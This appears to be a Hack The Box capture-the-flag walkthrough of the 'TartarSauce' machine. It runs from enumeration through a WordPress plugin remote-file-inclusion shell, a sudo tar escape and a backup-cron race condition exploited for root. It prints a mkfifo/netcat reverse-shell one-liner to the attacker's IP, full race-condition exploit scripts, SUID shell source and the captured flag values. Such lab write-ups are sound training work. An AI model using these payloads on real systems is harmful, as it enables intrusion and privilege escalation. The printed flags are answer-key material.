HTB-TartarSauce

TartarSauce

Target

  1. 2 flags

Process

Port Scan

sudo nmap -sS -p- --min-rate=10000 10.10.10.88

Info collection

Access the website

Go back to the enumeration, dirsearch provides another path /webservices

=====================================================
/index.html (Status: 200)
/robots.txt (Status: 200)
/webservices (Status: 301)
=====================================================

Trying to access the /webservices url just return a 403 forbidden. But another round of dirsearch gives a /wp path

=====================================================
/wp (Status: 301)
=====================================================

Wordpress Site

The website is broken.

After inspecting the web elements, we have to modify the /etc/hosts file to add the dns address to it


We can access the site normally, next step is to find the vulnerbilities in this Wordpress site

Wpscan

wpscan is a good tool to enumerate WordPress sites. I’ll use –enumerate p,t,au –plugins-detection mixedoption to enumerate plugins, themes, and users. The output is quite long, but snipped to show that it identifies three plugins:

wpscan  --url http://10.10.10.88/webservices/wp --enumerate t,u,ap  --plugins-detection mixed -t 500

[+] We found 3 plugins:
[+] Name: akismet - v4.0.3
 |  Last updated: 2018-05-26T17:14:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
[!] The version is out of date, the latest version is 4.0.6
[+] Name: brute-force-login-protection - v1.5.3
 |  Latest version: 1.5.3 (up to date)
 |  Last updated: 2017-06-29T10:39:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
[+] Name: gwolle-gb - v2.3.10
 |  Last updated: 2018-05-12T10:06:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[!] The version is out of date, the latest version is 2.5.2
[+] Enumerating installed themes (only ones marked as popular) ...
...

Shell as www-date

There’s a** RFI vulnerability in Gwolle Guestbook v 1.5.3**. In this case, visiting http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://ip/path will include that file

We can let the victim machine to access local web-server to make the reverse-shell
Open the local http server and nc listener and access the website again.


http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.11/shell.php

Shell as onuma

We get the initial shell as www-data, but we gotta to upgrade the machine priviledge, we can put the command sudo -l

As www-data, we can’t get into the lone user directory:

www-data@TartarSauce:/home$ ls
onuma
www-data@TartarSauce:/home$ cd onuma/
bash: cd: onuma/: Permission denied

Notice that user www-data can run sudo with no password for /bin/tar:

www-data@TartarSauce:/dev/shm$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar

Gtfobins

sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Get the user flag


User flag:** b2d6ec45472467c836f253bd170182c7**

Privesc onuma → root

We can have to copy the shell for us to improve our fault tolerance in case we disconnect the shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.11 4446 >/tmp/f &



Now we get 2 interactive shells

Indentify the cron with pspy32

pspy is the process detection, we can find

grab the backuperer to the local machine to analyze the file

Local machine:
nc -lp 6000 > backuper
Victim machine
nc <ip> 6000 < /usr/sbin/backuperer

Understanding backuper script

#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up in case another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

I’ll try to break it down into its important step
a. Use the tar command as onuma to take everything in $basedir( /var/www/html ) and save it as a gzip archive(-z) named $tmpfile. $tmpfile is /var/tmp/.[random sha1], so we know it will start with a “ . “,and what folder it will be in, but nothing else.

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

b. Sleep for 30 seconds

/bin/sleep 30

c. Make a temporary directory at /vat/tmp/check

/bin/mkdir $check

d. Extract $tmpfile to /var/tmp/check

/bin/tar -zxvf $tmpfile -C $check

e. Run the integrity_chk function, and it is exits cleanly, move the temp archive to /var/backups/onuma-www-dev.bak, and if not run integrity_chk again, and append its output to /var/backups/onuma_backup_error.txt

if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

Exploiting backuperer

Get the root flag

To exploit the script, we’ll take advantage of two things, the sleep for the 30s and the recursive diff. During sleep, we can unpack the archive, replace one of the files with a link to /root/root.txt, and re-archive it. Then when the script opens the archive and runs the diff, the resulting file will be different, and the contents of both files will end up in the log file.
I originally did this with a long bash one-liner, but it is easier to follow with a script:

# Author: Kelpie_Banshee
#!/bin/bash
# work out of some directory you are writeable and executable
cd /dev/shm
# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
echo "[+] Wait for new file"
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
    sleep 10;
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
# Grab the zip in the directory
echo "[+] Copy the zip file to work directory"
cp $cur .
filename=$(echo $cur | cut -d'/' -f4)
# Extract the archive
tar -zxf $filename
# Replace the robots.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt # Symbolic links
rm $filename
tar czf $filename var
# Put it back, and clean up
mv $filename $cur
rm $filename
rm -rf var
# Wait for the new error log
echo "[+] Waiting for the new error log"
tail -f /var/backups/onuma_backup_error.txt
exit

Now, upload this to target and run it. I’ll name it exp.sh for opsec:

./exp.sh
[+] Wait for new file
[+] Copy the zip file to work directory
tar: var/www/html/webservices/monstra-3.0.4/public/uploads/.empty: Cannot open: Permission denied
tar: Exiting with failure status due to previous errors
tar: var/www/html/webservices/monstra-3.0.4/public/uploads/.empty: Cannot stat: Permission denied
tar: Exiting with failure status due to previous errors
rm: cannot remove '.97ac3271d196cc084ec0f2b26df0efe63ff7d73e': No such file or directory
rm: cannot remove 'var/www/html/webservices/monstra-3.0.4/public/uploads/.empty': Permission denied
[+] Waiting for the new error log
< User-agent: *
< Disallow: /webservices/tar/tar/source/
< Disallow: /webservices/monstra-3.0.4/
< Disallow: /webservices/easy-file-uploader/
< Disallow: /webservices/developmental/
< Disallow: /webservices/phpmyadmin/
<
---
> e79abdab8b8a4b64f8579a10b2cd09f9
Only in /var/www/html/webservices/monstra-3.0.4/public/uploads: .empty
tail: inotify resources exhausted
tail: inotify cannot be used, reverting to polling

Root flag: e79abdab8b8a4b64f8579a10b2cd09f9

Get the root shell

we can make the SUID shell

// Usage: gcc -m32 -o suid suid.c && ./suid
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
  setreuid(0, 0);
  execve("/bin/bash", NULL, NULL);
  return 0;
}

From the output of uname-a, we have seen that tartarsauce has a 32-bit architecture, so the compilation is as follows:

Local Machine:
sudo apt-get install gcc-multilib
sudo gcc -m32 -o suid suid.c
sudo mkdir -p  var/www/html
sudo cp suid var/www/html
sudo chmod 6555 var/www/html/suid
ls -la var/www/html/suid
-r-sr-sr-x 1 root root 15480 Nov  1 16:35 var/www/html/suid
sudo tar -zcvf suid.tar.gz var --owner=root --group=root
# Author: Kelpie_Banshee
# !/bin/bash
# Usage: bash shell.sh
# work out of some directory you are writeable and executable
cd /tmp
# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
# loop until there's a change in cur
echo "[+] Waiting for archive filename to change"
while [ "$cur" == "" ] ; do
    sleep 10;
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
echo "[+] Copy the archive"
echo $cur
# Relpace the original archive
cp suid.tar.gz $cur
exit